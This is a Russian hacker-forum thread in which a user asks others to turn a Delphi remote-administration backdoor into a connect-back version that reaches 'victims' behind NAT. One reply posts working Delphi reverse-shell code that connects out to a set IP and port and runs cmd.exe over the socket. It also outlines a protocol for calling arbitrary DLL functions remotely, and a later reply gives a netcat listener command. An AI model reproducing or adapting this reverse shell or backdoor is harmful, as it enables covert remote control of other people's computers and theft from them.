Форум АНТИЧАТ - Кто нибудь может переделать бекдор под бекконнект?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)

Кто нибудь может переделать бекдор под бекконнект?

В общем, ситуация следующая, это не заказ программы, а так сказать идея.
На данный момент, если я не ошибаюсь, в интернете нету ни одного бекконнект-бекдора, а 70-80% интернетчиков, особенно Москвичи сидят за NAT.
Вот хотелось бы предложить написать кому-нибудь такой бекдор, он будет в новинку, и я уверен будет пользоваться популярностью, ибо вещь нужная, но нету 
Но чем писать с нуля, проще модифицировать исходник какого-нибудь достойного бекдора где уже есть всё необходимое, и такой исходник на Delphi имеется, это Forced Control Uploader (FCU), лично на мой взгляд превосходит великий Radmin почти во всём.
Во первых умеет видеть скрытые файлы и папки, во вторых есть функция загрузки и запуска файла на компе у жертвы, ну и в третьих самоуничтожение.
Принцип стандартного бекдора, сервер (вес около 60 килобайт) открывает порт (можно с паролем), ну и клиент который джонится к внешнему IP адресу.

Вот идеальный вариант если кто может, конечно же модифицировать его под бекконнект. Чтобы сервер при запуске не открывал порт, а сам пытался заджониться по IP адресу (или адресу сайта) на определённый порт.
А в клиенте надо сделать такую функцию, чтобы он принимал соединение только с указанного IP адреса (потому что жертва не одна, их может быть много), ну а чтобы узнать IP адрес в сервере можно добавить функцию, чтобы он отстукивал скажем на гейт с сообщением +IP+ готов к соединению…
На мой взгляд, незаменимая вещь в хозяйстве.

Ну и вот сам исходник на Delphi этого FCU:
http://ifolder.ru/8374569

Цитата:

На данный момент, если я не ошибаюсь, в интернете нету ни одного бекконнект-бекдора

Ты ошибаешься.

По секрету первый rdp бекконеект появился еще 2003 году.

Ну тогда ссылки в студию где это чудо можно увидеть, естественно имеется ввиду чтобы там была функция лазить по винчестеру, а не просто командная строка или фишки типа открыть\закрыть сидиром и т.д...

И тогда такой вопрос, а исходники на Delphi подобных бекдоров есть?

Дык всё тут просто. проще некуда. Уже давно существую и бекконнект бекдоры и бекконнект соксы.
На счет простого бекконнект бекдора - можно было прочитать еще в статье Криса Касперски, где он описывал проход через фаерволы. и для демонстрации там была вешь типа бекконнект шел. На дельфе редается это в пару команд

Для простой демонстрации вот наспех написанный код

Код:



var

 StartupInfo:_STARTUPINFOA;

 ProcessInformation:_PROCESS_INFORMATION;

 addr:tsockaddrin;

 sock:thandle;

 wsdata:TWSADATA;

const

 shell_port=12345;

 shell_ip='127.0.0.1';

begin

 WSAStartup($202,wsdata);

 sock:=WSASocketA(2,1,6,nil,0,0);

 if sock=INVALID_SOCKET then exit;

 addr.sin_family:=AF_INET;

 addr.sin_addr.s_addr:=0;

 addr.sin_port:=htons(shell_port);

 addr.sin_addr.s_addr := inet_addr(shell_ip);

 if Connect(sock, @addr, SizeOf(addr))<>0 then

  begin

   closesocket(sock);

   exit;

  end;

 fillchar(StartupInfo,sizeof(StartupInfo),0);

 StartupInfo.cb:=sizeof(StartupInfo);

 StartupInfo.dwFlags:=$100;

 StartupInfo.hStdInput:=sock;

 StartupInfo.hStdOutput:=sock;

 StartupInfo.hStdError:=sock;

 CreateProcessA(nil,'cmd.exe',nil,nil,true,$8000040,nil,nil,StartupInfo,ProcessInformation);

end;

Это просто пример для Shell
А так я задумывался както над довольно интерестной вешью в плане сетевого програмимрования. Но времяни небыло для реализации. Суть её такова:
Структура команды следующая
Имя библиотеки + имя функции + параметры + что передать обратно в сокет.
И идет это примерно так
1) Читаешь команду из сокета
2) грузишь бебиблиотеку
3) грузишь функцию из неё
4) выполняешь эту функцию с заданными параметрами
5) результат выполнения передается обратно в зависимости от параметров которые были указаны в запросе. Или коды ошибок

Теоретически таким образом можно делать практически всё что угодно.
К примеру нужно вывести на экран сообщение
для этого будет типа
len_lib + user32.dll + len_name + MessageBoxA + param_type+[param_len]+param итд ... + 0
типа
0 - результат выполнения функции
1 ... n - переданный параметр
При том что организация переменных - тоже проста. а заранее указанные типы данных тоже расширяют всё.
В этоге теоретически можно мное что делать удаленно.
P.S. Но это тока пока моя теория.

Если-б я мог написать бекконнект-бекдора я наверное не создавал-бы тему.
А так-же я знаю что они ЕСТЬ в теории, но не про нашу честь. Скачать и заюзать их всё равно нельзя.

Цитата:

Сообщение от slesh

А так я задумывался както над довольно интерестной вешью в плане сетевого програмимрования. Но времяни небыло для реализации. Суть её такова:
Структура команды следующая
Имя библиотеки + имя функции + параметры + что передать обратно в сокет.
И идет это примерно так
1) Читаешь команду из сокета
2) грузишь бебиблиотеку
3) грузишь функцию из неё
4) выполняешь эту функцию с заданными параметрами
5) результат выполнения передается обратно в зависимости от параметров которые были указаны в запросе. Или коды ошибок

Теоретически таким образом можно делать практически всё что угодно.
К примеру нужно вывести на экран сообщение
для этого будет типа
len_lib + user32.dll + len_name + MessageBoxA + param_type+[param_len]+param итд ... + 0
типа
0 - результат выполнения функции
1 ... n - переданный параметр
При том что организация переменных - тоже проста. а заранее указанные типы данных тоже расширяют всё.
В этоге теоретически можно мное что делать удаленно.
P.S. Но это тока пока моя теория.

такое уже вроде в природе существует ru.wikipedia.org/wiki/Remote_Procedure_Call

slesh в твоем коде производится соединение, но порт не связывается/перечислять и не производится accept, он разве будет работать?

2 0verbreaK дык это connect back - по этмоу еще как работает. т.е. он стучится на ткрытый порт.
Типа nc -p 12345 -L

Так всё-таки, может ли кто в данном исходнике изменить просто назначение клиента и сервера просто поменяв функции местами?